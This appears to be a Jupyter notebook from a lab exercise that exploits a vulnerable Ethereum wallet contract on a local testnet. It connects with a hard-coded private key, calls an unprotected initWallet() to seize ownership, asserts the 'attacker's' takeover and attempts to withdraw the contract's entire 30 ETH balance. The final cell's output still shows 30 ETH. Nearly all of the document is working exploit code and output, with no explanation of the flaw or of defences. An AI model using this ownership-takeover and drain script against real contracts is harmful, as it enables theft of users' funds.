In [25]:
from web3 import Web3
from eth_account import Account

# Connect to the Ethereum testnet
web3 = Web3(Web3.HTTPProvider('http://geth-client-cnt:8545'))
from web3.middleware import geth_poa_middleware  # web3 version 6.20.2

# Check connection
print("Connected:", web3.is_connected())

web3.middleware_onion.inject(geth_poa_middleware, layer=0)

Connected: True


In [26]:
# Use your private key from Anvil or Geth
PRIVATE_KEY = "0xca7a5a846f5c2583fe98d5ad2b351fc0e7cfb0b587fbb449b9da2ebf5e5fdbec"
ACCOUNT = web3.eth.account.from_key(PRIVATE_KEY)
ACCOUNT_ADDRESS = ACCOUNT.address

print("Using account:", ACCOUNT_ADDRESS)

Using account: 0x69C12857c91808d45d704100911a19FDf335B29f


In [27]:
# Target contract address (replace with actual address)
TARGET_CONTRACT = "0x306150F9c14980eC3307D5811C6444bA452Ea777"

# ABI for the vulnerable contract (minimal version)
ABI = [
    {"constant": False, "inputs": [{"name": "_owner", "type": "address"}], "name": "initWallet", "outputs": [], "type": "function"},
    {"constant": False, "inputs": [{"name": "amount", "type": "uint256"}], "name": "withdraw", "outputs": [{"name": "success", "type": "bool"}], "type": "function"},
    {"constant": True, "inputs": [], "name": "getOwner", "outputs": [{"name": "", "type": "address"}], "type": "function"}
]
# Load the contract
contract = web3.eth.contract(address=TARGET_CONTRACT, abi=ABI)

In [28]:
# Step 1: Call initWallet() to become owner
tx1 = contract.functions.initWallet(ACCOUNT_ADDRESS).build_transaction({
    'from': ACCOUNT_ADDRESS,
    'gas': 100000,
    'gasPrice': web3.to_wei('5', 'gwei'),
    'nonce': web3.eth.get_transaction_count(ACCOUNT_ADDRESS),
})

# Step 2: Sign the transaction
signed_tx1 = web3.eth.account.sign_transaction(tx1, PRIVATE_KEY)

# Step 3: Send the transaction
tx_hash1 = web3.eth.send_raw_transaction(signed_tx1.rawTransaction)
print("initWallet() TX:", web3.to_hex(tx_hash1))

# Step 4: Wait for the transaction to be mined
tx_receipt1 = web3.eth.wait_for_transaction_receipt(tx_hash1)
print("Transaction receipt:", tx_receipt1)

initWallet() TX: 0x3fe6721d5e39dbe703ed282b47dcf5ef5ad99bb9fe691395d188306d15b49574
Transaction receipt: AttributeDict({'blockHash': HexBytes('0x3a73b2c52009612b00f83ec819e3e1929ae199e68e310792429583fab61978ad'), 'blockNumber': 318777, 'contractAddress': None, 'cumulativeGasUsed': 36038, 'from': '0x69C12857c91808d45d704100911a19FDf335B29f', 'gasUsed': 36038, 'logs': [AttributeDict({'address': '0x306150F9c14980eC3307D5811C6444bA452Ea777', 'topics': [HexBytes('0xa9a26360ded17bbe6528a5ec42df34cc22964927204d7a69575e12c6839d426c')], 'data': HexBytes('0x000000000000000000000000000000000000000000000000000000000000012d0000000000000000000000000000000000000000000000000000000000000000'), 'blockNumber': 318777, 'transactionHash': HexBytes('0x3fe6721d5e39dbe703ed282b47dcf5ef5ad99bb9fe691395d188306d15b49574'), 'transactionIndex': 0, 'blockHash': HexBytes('0x3a73b2c52009612b00f83ec819e3e1929ae199e68e310792429583fab61978ad'), 'logIndex': 0, 'removed': False})], 'logsBloom': HexBytes('0x080000000000000

In [29]:
# Verify that you are now an owner
new_owner = contract.functions.getOwner().call()
print("New Owner: ", new_owner)

#confirm attacker's address is now the owner
assert new_owner.lower() == ACCOUNT_ADDRESS.lower(), "Ownership takeover failed!"



New Owner:  0x69C12857c91808d45d704100911a19FDf335B29f


In [30]:
# Step 1: Get the full contract balance
contract_balance = web3.eth.get_balance(TARGET_CONTRACT)
print("Contract Balance:", web3.from_wei(contract_balance, 'ether'), "ETH")

# Step 2: Withdraw all available funds
tx2 = contract.functions.withdraw(contract_balance).build_transaction({
    'from': ACCOUNT_ADDRESS,
    'gas': 100000,
    'gasPrice': web3.to_wei('5', 'gwei'),
    'nonce': web3.eth.get_transaction_count(ACCOUNT_ADDRESS),
})

# Step 3: Sign and send the transaction
signed_tx2 = web3.eth.account.sign_transaction(tx2, PRIVATE_KEY)
tx_hash2 = web3.eth.send_raw_transaction(signed_tx2.rawTransaction)

print("Withdraw() TX:", web3.to_hex(tx_hash2))

Contract Balance: 30 ETH
Withdraw() TX: 0x58724ae2410990d369306eea0ffe31ae10928bbf9cda5051e9277b0958b90890


In [31]:
# Check the updated contract balance
contract_balance = web3.eth.get_balance(TARGET_CONTRACT)
print("Contract Balance:", web3.from_wei(contract_balance, 'ether'), "ETH")

Contract Balance: 30 ETH
